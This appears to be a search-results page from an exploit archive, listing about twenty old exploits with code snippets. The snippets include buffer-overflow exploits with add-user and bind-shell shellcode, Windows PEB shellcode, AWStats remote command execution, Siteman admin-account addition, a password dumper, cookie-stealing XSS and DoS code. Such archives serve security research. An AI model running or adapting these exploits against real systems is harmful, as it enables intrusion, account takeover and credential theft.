2058 matches found
Savant Web Server 3.1 - Remote Buffer Overflow (1)
Savant web server Buffer Overflow Exploit Discovered by : Mati Aharoni Coded by : Tal Zeltzer and Mati Aharoni www.see-security.com FOR RESEARCH PURPOSES ONLY! import struct import socket sc = "\x90" 21 win32adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub...
JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability
JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability. Webapps exploit for php platform source: http://www.securityfocus.com/bid/12403/info JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'product.php' script. As a result of this vulnerability...
WarFTPD 1.82 RC9 DoS
Hello, due to an access violation, specially crafted CWD-Commands will exit the FTP server when running as a NT service. User needs to be logged on. Vendor's report can be found at http://support.jgaa.com/index.php?cmd=ShowReport&ID=02643 Solution: deny anonymous or untrusted logins or use patched...
windows 9x/NT/2k/XP PEB method 31 bytes
Exploit for win32 platform in category shellcode ======================================= Windows 9x/NT/2k/XP PEB method 31 bytes ======================================= / 004045F4 6A 30 PUSH 30 004045F6 59 POP ECX 004045F7 64:8B09 MOV ECX,DWORD PTR FS:ECX 004045FA 85C9 TEST ECX,ECX 004045FC 78 0C...
Windows 9x/NT/2k/XP PEB method 31 bytes
Windows 9x/NT/2k/XP PEB method 31 bytes. Shellcode exploit for win32 platform / 004045F4 6A 30 PUSH 30 004045F6 59 POP ECX 004045F7 64:8B09 MOV ECX,DWORD PTR FS:ECX 004045FA 85C9 TEST ECX,ECX 004045FC 78 0C JS SHORT OllyTest.0040460A 004045FE 8B49 0C MOV ECX,DWORD PTR DS:ECX+C 00404601 8B71 1C MO...
AWStats configdir Remote Command Execution Exploit (perl code)
No description provided by source. !/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special greets 2 d0G4 & cr0n for...
Siteman 1.1.10 - Remote Administrative Account Addition
!/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my...
Funduc Search and Replace Compressed File Local BoF Exploit
No description provided by source. / Search and Replace Compressed File search Local Buffer Overflow Exploit Discovered & Coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] Greetings to: Tarako / / Search and Replac...
Golden FTP Server 2.02b - Remote Buffer Overflow
!/usr/bin/perl -w Barabas - www.whitehat.co.il - cheers to muts and all peeps at WH. XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload="\x41"x260; $payload .="\x65\x82\xa5\x7c";jmpesp $payload .="\x90"x32;not really necessary...blah win32bind - EXITFUNC=seh LPORT=4444...
Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit
Exploit for macOS platform in category local exploits ============================================================= Mac OS X include include define VULNPROG "/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/ mRouter" define MAXBUFSIZE 4096 char shellcode = // Shellcode by...
Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service
/ DoS for Darwin Kernel Version int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho - 2004 DoS for OSX darwin 7.5.0 -\n" ; printf "- nemo pulltheplug org -\n\n" ; printf "+ Opening file for writing.\n" ; if ! me = fopen av, "r+" printf "- Error opening exe.\n...
Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS
No description provided by source. / DoS for Darwin Kernel Version 7.5.0 -nemo pulltheplug org- 2005 greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ; irc.pulltheplug.org social / include stdio.h int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho -...
Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service
Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service / DoS for Darwin Kernel Version int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho - 2004 DoS for OSX darwin 7.5.0 -\n" ; printf "- nemo pulltheplug org -\n\n" ; printf "+ Opening...
[EXPL] ITA Forum SQL Injection
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Peer2Mail <= 1.4 Encrypted Password Dumper Exploit
No description provided by source. / Peer2Mail Encrypt PassDumper Exploit v1.0 Discovered & Coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] / / Peer2Mail 1.4 and prior versions are affected. Tested for gmail...
exim.pl.txt
This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. In this report it was explained that a sequence like the one below overflowed some internal buffer: /usr/bin/exim -bh ::%Aperl -e 'print pack'L',0xdeadbeef x 256' It...
Apple iTunes - Playlist Buffer Overflow Download Shellcode
/ Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit Bug discovered by iDEFENSE Security http://www.idefense.com Exploit coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] Credit to xT and delikon...
forumKIT.txt
Vulnerable System : forumKIT 1.0 Description : an XSS was found in the variable members, which has the value 'true'; you can exchange it with XSS code. exploit : http://forum.target.com/f.aspx?members="alertdocument.cookie; this exploit was discovered by : neO e-mail : [email protected]...
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
/ This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. It has been tested against exim-4.41 under Debian GNU/Linux. Note that setuid is not included in the shellcode to avoid script-kidding. My RET is 0xbffffae4, but fb.pl...
Gore <= 1.50 Socket Unreacheable Denial of Service Exploit
No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h ifdef WIN32 include winsock.h / winerr.h + amp2zero.c / [email protected] / / Header file used for manage errors in Windows It support socket and errno too this header replace the previous...